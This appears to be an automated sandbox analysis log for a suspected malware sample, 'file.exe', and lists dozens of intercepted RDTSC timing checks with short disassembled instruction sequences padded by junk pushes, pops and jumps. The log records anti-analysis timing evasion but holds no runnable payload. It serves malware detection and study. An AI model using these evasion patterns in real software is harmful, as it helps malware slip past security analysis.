Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B8B second address: AF2BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jp 00007F5444E6F4F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2BAE second address: AF2BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6886 second address: AF688E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFE5F6 second address: AFE600 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFE600 second address: AFE623 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4F6h 0x00000008 jmp 00007F5444E6F505h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFE623 second address: AFE627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFE627 second address: AFE631 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC634 second address: AFC63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC63A second address: AFC675 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5444E6F502h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5444E6F4FAh 0x00000015 pushad 0x00000016 jmp 00007F5444E6F503h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC675 second address: AFC67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFCC07 second address: AFCC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFCC0B second address: AFCC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFCF1C second address: AFCF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD78A second address: AFD799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5444755FA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD799 second address: AFD7C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jnl 00007F5444E6F516h 0x00000010 push edx 0x00000011 jbe 00007F5444E6F4F6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F5444E6F4F6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD7C1 second address: AFD7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD7C5 second address: AFD7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDA84 second address: AFDA97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5444755FA6h 0x00000009 ja 00007F5444755FA6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDD8B second address: AFDD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDD91 second address: AFDD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDD99 second address: AFDD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDD9D second address: AFDDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B033ED second address: B033F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0282E second address: B02832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02832 second address: B02836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B029F4 second address: B029FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B029FC second address: B02A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02B6F second address: B02B7F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444755FA6h 0x00000008 jc 00007F5444755FA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02B7F second address: B02B90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F5444E6F4FAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02CCE second address: B02CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02E31 second address: B02E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5444E6F4F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02E3E second address: B02E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02FAB second address: B02FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02FB1 second address: B02FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5444755FA6h 0x0000000a jnp 00007F5444755FA6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02FC6 second address: B02FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5444E6F4F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A19C second address: B0A1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A1A2 second address: B0A1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5444E6F501h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5444E6F4F6h 0x00000014 jmp 00007F5444E6F4FBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B12190 second address: B121C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5444755FA6h 0x0000000a jnl 00007F5444755FA6h 0x00000010 popad 0x00000011 je 00007F5444755FBFh 0x00000017 jmp 00007F5444755FB7h 0x0000001c push eax 0x0000001d pop eax 0x0000001e jng 00007F5444755FB2h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B103C8 second address: B103D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5444E6F4F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B103D2 second address: B103D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1096E second address: B10983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B110F4 second address: B11121 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5444755FB0h 0x0000000c jc 00007F5444755FA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B11121 second address: B1112B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1112B second address: B11143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5444755FA6h 0x0000000d jmp 00007F5444755FABh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B11F64 second address: B11F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0FE68 second address: B0FE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B188A4 second address: B188A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2813D second address: B2816C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F5444755FB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B27CF9 second address: B27CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B27CFF second address: B27D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B27D17 second address: B27D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5444E6F50Fh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2B10F second address: B2B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2B113 second address: B2B13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F506h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F5444E6F500h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FD82 second address: B2FD86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FD86 second address: B2FD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FD8C second address: B2FD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FD92 second address: B2FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32280 second address: B32292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5444755FADh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32292 second address: B322C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5444E6F508h 0x00000009 jmp 00007F5444E6F502h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B322C0 second address: B322C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B322C6 second address: B322D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F5444E6F4F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38295 second address: B3829A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3829A second address: B382A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5444E6F4F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B382A4 second address: B382AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B968 second address: B3B96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B96E second address: B3B988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jnp 00007F5444755FA6h 0x0000000f jmp 00007F5444755FAAh 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45435 second address: B4543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4543B second address: B4547F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB7h 0x00000007 pushad 0x00000008 jng 00007F5444755FA6h 0x0000000e js 00007F5444755FA6h 0x00000014 jnl 00007F5444755FA6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jo 00007F5444755FC0h 0x00000023 jbe 00007F5444755FACh 0x00000029 jg 00007F5444755FA6h 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4547F second address: B45485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43CFC second address: B43D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5444755FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43E9C second address: B43EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F501h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43FDA second address: B43FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F5444755FAAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43FEF second address: B44024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5444E6F501h 0x0000000d push edi 0x0000000e jmp 00007F5444E6F4FEh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44199 second address: B441A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5444755FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B441A3 second address: B441A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B445E8 second address: B445EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B445EF second address: B44623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F509h 0x00000007 jmp 00007F5444E6F502h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44623 second address: B44636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F5444755FA6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44636 second address: B4463C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4463C second address: B44640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44640 second address: B44644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44644 second address: B4464A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A35F second address: B4A363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A363 second address: B4A367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A367 second address: B4A36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A36D second address: B4A388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5444755FB4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A388 second address: B4A396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A396 second address: B4A39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DFFA second address: B4DFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DFFE second address: B4E004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4E004 second address: B4E013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F5444E6F4F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B54184 second address: B54188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55C4E second address: B55C58 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5444E6F4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B2C7 second address: B6B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F5444755FAAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81D98 second address: B81DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5444E6F4FEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DAB second address: B81DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5444755FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82CF7 second address: B82D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D02 second address: B82D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444755FB1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D18 second address: B82D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D1E second address: B82D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB3h 0x00000009 popad 0x0000000a jo 00007F5444755FB1h 0x00000010 jmp 00007F5444755FABh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82D4D second address: B82D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84711 second address: B84717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84717 second address: B84722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84722 second address: B84726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84726 second address: B8472A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
